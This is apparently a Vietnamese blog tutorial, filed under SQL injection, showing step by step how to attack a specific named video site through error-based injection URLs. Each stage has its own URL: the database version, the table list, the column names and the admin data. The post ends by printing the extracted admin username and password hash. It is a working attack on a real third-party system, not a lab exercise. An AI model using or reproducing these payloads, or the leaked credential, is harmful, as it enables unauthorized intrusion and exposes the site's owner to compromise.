Trang chủ
»
SQL Injection
» [TUT] - SQL http://phim.haylem.net (fake HTML)
4 thg 8, 2012
[TUT] - SQL http://phim.haylem.net (fake HTML)
Cũng là Rewrite đuôi thành HTML.Tutorial:
Get version
http://phim.haylem.net/the-loai/Hanh...7e,version())) and 'a'='a/page-1.html
Get table
http://phim.haylem.net/the-loai/Hanh...se()+limit+0,1 ))) and 'a'='a/page-1.html
Thay limit 0,1 bởi limit 1,1 ..... limit 12,1 ta được tất cả table
Get column
http://phim.haylem.net/the-loai/Hanh...6572+limit+2,1 ))) and 'a'='a/page-1.html
Get data admin
http://phim.haylem.net/the-loai/Hanh...user+limit+0,1 ))) and 'a'='a/page-1.html
Ta được:
admin|b56f4ab266bd60dc6e8ff73ed
Không có nhận xét nào:
Đăng nhận xét